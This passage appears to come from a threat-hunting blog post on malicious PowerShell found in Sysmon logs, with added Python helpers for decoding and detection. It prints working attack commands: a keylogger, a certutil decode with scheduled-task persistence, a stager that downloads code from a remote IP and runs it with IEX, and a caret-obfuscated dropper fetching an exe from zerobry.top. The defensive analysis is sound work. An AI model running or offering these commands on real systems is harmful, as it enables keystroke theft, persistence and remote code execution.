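Decoding the -enc argument of the two commands above, as an added example that is not part of the original post: PowerShell expects the blob to be base64 over UTF-16LE text, and exported logs often cut long blobs short (the second blob above ends in "..."), so the decoder below decodes as far as the data allows instead of failing. The indicator list is constructed from the behaviours seen in the decoded commands on this page plus a few generic loader patterns; the sample script is two lines taken from the first decoded command, re-encoded the way its launcher would carry them.

```python
import base64
import re


def encode_command(script):
    """Produce the -EncodedCommand argument as PowerShell expects it: UTF-16LE text, base64-encoded."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def extract_encoded_blob(cmdline):
    """Return the token following -e/-ec/-enc/-EncodedCommand (any prefix of EncodedCommand), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        key = tok[1:].lower()
        if tok[:1] in ("-", "/") and key and ("encodedcommand".startswith(key) or key == "ec"):
            return tokens[i + 1]
    return None


def decode_encoded_command(blob):
    """Decode a base64/UTF-16LE blob. Exported logs truncate long blobs, so decode the readable
    prefix instead of raising on a blob whose tail is missing."""
    clean = re.sub(r"[^A-Za-z0-9+/]", "", blob)   # keep the base64 alphabet; drops '=' and '...'
    if len(clean) % 4 == 1:
        clean = clean[:-1]                        # a lone trailing sextet carries no whole byte
    clean += "=" * (-len(clean) % 4)
    raw = base64.b64decode(clean)
    if len(raw) % 2:
        raw = raw[:-1]                            # UTF-16LE code units are two bytes wide
    return raw.decode("utf-16le", errors="replace")


# Behaviours an analyst wants pulled out of a decoded payload immediately: the ones seen in the
# decoded commands on this page plus a few generic loader patterns.
INDICATORS = [
    (r"vssadmin\s+delete\s+shadows", "shadow copy deletion"),
    (r"wevtutil\s+cl\b", "event log clearing"),
    (r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", "host firewall disabled"),
    (r"WinDefend|DisableAntiSpyware", "Defender tampering"),
    (r"GetAsyncKeyState", "keystroke capture API"),
    (r"certutil(?:\.exe)?\s+-decode", "certutil used as a decoder"),
    (r"schtasks(?:\.exe)?\s+/create", "scheduled task creation"),
    (r"\[Reflection\.Assembly\]::(?:UnsafeLoadFrom|LoadFile|Load)\b", "reflective assembly load"),
    (r"Download(?:String|File)", "web download"),
    (r"\bIEX\b|Invoke-Expression", "Invoke-Expression of fetched content"),
]


def find_indicators(script):
    return [name for pattern, name in INDICATORS if re.search(pattern, script, re.I)]


def analyse(cmdline):
    """Decode the -enc payload of a command line and list the behaviours found in it."""
    blob = extract_encoded_blob(cmdline)
    if blob is None:
        return None, []
    script = decode_encoded_command(blob)
    return script, find_indicators(script)


# Constructed sample: two lines from the first decoded command above, re-encoded.
SAMPLE_SCRIPT = 'wevtutil el | Foreach-Object {wevtutil cl "$_"}\r\nvssadmin delete shadows /for=c: /all /quiet'
SAMPLE_CMDLINE = "powershell -win hidden -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    script, hits = analyse(SAMPLE_CMDLINE)
    print(script)
    print("indicators:", hits)
    # A blob cut short by the log exporter still yields its readable prefix.
    print(decode_encoded_command(encode_command(SAMPLE_SCRIPT)[:50] + "..."))
```

Running find_indicators over the decoded text rather than the raw CommandLine is the point: none of the strings in INDICATORS appear in the base64 form, so a search that does not decode first misses every one of these commands.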
powershell -win hidden -enc
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
function DynAmite-Key {
$dateandtime = Get-Date -Format yyyy-MM-dd-HH-mm; $time = Get-Date -Format HH-mm
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class UserWindows {[DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow();}
"@
$logfile = $loot + "keylog_" + "$dateandtime"+ ".log"
$MAPVK_VK_TO_VSC = 0x00
$MAPVK_VSC_TO_VK = 0x01
$MAPVK_VK_TO_CHAR = 0x02
$MAPVK_VSC_TO_VK_EX = 0x03
$MAPVK_VK_TO_VSC_EX = 0x04
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {Start-Sleep -Milliseconds 40
$TopWindow = [UserWindows]::GetForegroundWindow();
$WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
$gotit = ""
for ($char = 1; $char -le 254; $char++) {$vkey = $char
$gotit = $getKeyState::GetAsyncKeyState($vkey)
if ($gotit -eq -32767) {$l_shift = $getKeyState::GetAsyncKeyState(160)
$r_shift = $getKeyState::GetAsyncKeyState(161)
$caps_lock = [console]::CapsLock
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
$kbstate = New-Object Byte[] 256
$checkkbstate = $getKBState::GetKeyboardState($kbstate)
$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
if ($unicode_res -gt 0) {Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject ($time + " " + $WindowTitle), $mychar.ToString() } } }}}
DynAmite-Key
powershell -win hidden -enc
The following command uses 'certutil' to create binary files which are later executed, as shown below:
$loot = ($env:LOCALAPPDATA + "\dyna\"); md $loot
certutil -decode res.crt ($loot + "res"); certutil -decode kl.crt ($loot + "kl.exe"); certutil -decode st.crt ($loot + "st.exe"); certutil -decode cry.crt ($loot + "cry.exe"); certutil -decode t1.crt ($env:TEMP + "\t1.xml"); certutil -decode t2.crt ($env:TEMP + "\t2.xml"); certutil -decode t3.crt ($env:TEMP + "\t3.xml"); certutil -decode t4.crt ($env:TEMP + "\t4.xml"); certutil -decode t5.crt ($env:TEMP + "\t5.xml"); certutil -decode bd.crt C:\ProgramData\bd.exe
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\1" /XML ($env:TEMP + "\t1.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\2" /XML ($env:TEMP + "\t2.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\3" /XML ($env:TEMP + "\t3.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\4" /XML ($env:TEMP + "\t4.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\5" /XML ($env:TEMP + "\t5.xml")
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\1"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\2"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\3"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\4"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\5"
Remove-Item ..
"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwBhADMAZgA1ADcAM.....CQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=
The next one in the list is quite interesting as well. It uses some .NET Framework functions to load additional code.
$x='a3f57212-1462-4ae7-8745-5e178820d04c';
$y='Z:\tmp\0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4.exe';
try {
if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)}
. ([_32._88]::_74($x))
exit $LASTEXITCODE
} catch [NotSupportedException] {
Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red
} catch {
Write-Host ("Error: " + $_.Exception.Message) -Fore Red
}
powershell.exe -NoP -sta -NonI -W Hidden -Enc
[SYsTeM.Net.SERviCePoiNtMANAGER]::ExPECt100CoNtiNuE = 0;$wC=New-ObJeCt SYstEm.NeT.WebCliENt; $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeADeRs.AdD('User-Agent',$u);$wC.PrOxy = [SySTeM.NeT.WebRequESt]::DEfAUltWEBPrOXY;$Wc.PROXy.CrEDenTiALS = [SystEm.NEt.CREdEnTIALCAchE]::DeFAulTNetwoRKCRedEntIAlS;$K='u)1,y(mjfa*E5#2LO3}9h6c-zIx]iok%';$i=0;[chAR[]]$B=([CHAr[]] ($wc.DowNLoADStRing("http://38.100.163.39:8080/index.asp")))|%{$_-BXOr$k[$I++%$k.LenGTH]};IEX ($B-join''
powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
This PowerShell command acts as a dropper. It is interesting to check the ParentCommandLine, as it uses the character "^" to evade detection:
"C:\Windows\System32\cmd.exe" /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
The last command detects whether an antivirus/antispyware product is installed and running:
powershell.exe -inputformat none -NoProfile -NoLogo -Command "& {$avlist = @(); $os = Get-WmiObject Win32_OperatingSystem; if ($os.ProductType -eq 3) {Write-Host \"ServerOS|0\";} elseif ($os.Version -like \"5.*\") {Get-WmiObject -Namespace root\SecurityCenter -Class AntiVirusProduct | ForEach-Object {Write-Host \"$($_.displayName)|$(if ($_.onAccessScanningEnabled) {\"4096\"} else {\"0\"})\"};} else {Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiSpywareProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};} Write-Host ($avlist -join \"*\")}"
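The caret-escaped ParentCommandLine of the dropper shown above defeats a naive string match for "powershell" or "DownloadFile". As an added example that is not part of the original post, the normalisation a detection pipeline would apply before matching: undo cmd.exe caret escaping (outside double quotes, "^" escapes the next character), fold PowerShell 'a'+'b' literal concatenation, and rewrite the .('Method').invoke(...) idiom to a plain method call so the real method name and URL become visible. The sample input is the parent command line from the page; the quoting rules are as I know them for cmd.exe.

```python
import re


def cmd_unescape(cmdline):
    """Undo cmd.exe caret escaping. Outside double quotes '^' escapes the next character
    (po^wers^hell -> powershell, ^^ -> ^); inside double quotes a caret is literal."""
    out, i, in_quotes = [], 0, False
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 1
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def fold_string_concat(script):
    """Collapse 'a'+'b' literal concatenation (repeatedly, for chains of three or more) and the
    .('Method').invoke(...) idiom so the real method name and URL are visible to a pattern match."""
    pattern = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    previous = None
    while previous != script:
        previous = script
        # a callable replacement keeps backslashes in the literals from being read as escapes
        script = pattern.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return re.sub(r"\.\('([A-Za-z]+)'\)\.invoke\(", r".\1(", script, flags=re.I)


def normalise(parent_cmdline):
    """Full normalisation of a cmd.exe parent command line that launches PowerShell."""
    return fold_string_concat(cmd_unescape(parent_cmdline))


def extract_urls(text):
    return re.findall(r"https?://[^\s'\",)]+", text)


# The ParentCommandLine from the page, used here as the sample input.
SAMPLE_PARENT_CMDLINE = r'''"C:\Windows\System32\cmd.exe" /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';'''

if __name__ == "__main__":
    clean = normalise(SAMPLE_PARENT_CMDLINE)
    print(clean)
    print("URLs before normalisation:", extract_urls(SAMPLE_PARENT_CMDLINE))
    print("URLs after normalisation: ", extract_urls(clean))
```

Before normalisation the URL extractor finds nothing, because "http://" never appears as a contiguous string in the raw command line; after it, the download URL and the "Downloadfile" method name are both plain text that any existing rule can match.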
As shown, PowerShell can be abused in many different ways through the different phases of an intrusion, therefore it is very important to monitor suspicious PowerShell commands, and Sysmon + Splunk can really help for this purpose.
Indicators:
a64b9215aff8a71333e9a5df5cd3b371b6b0a6d6a44604a93f0ba928c4f60d8d
91746786d3db211a33bfb851029cb3b42224cbc1d01f8b45d8ab4d6ef872ab81
9d3b4f233a61322d9738700f9e42b729a160fe651167e8454a25fbc74e4cf9ef
573301614d192de0ac34754e73c9f4ad036db318326421b66eb9fb394c7d3298
0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4
64aac1af18109e6661fb86a52c4024f81ef761818651897cde47eb71d8825de9
6d57ecd0b30fd27b793120ba16c208e58a986961fa0afc9c603b06b9ef66f7d9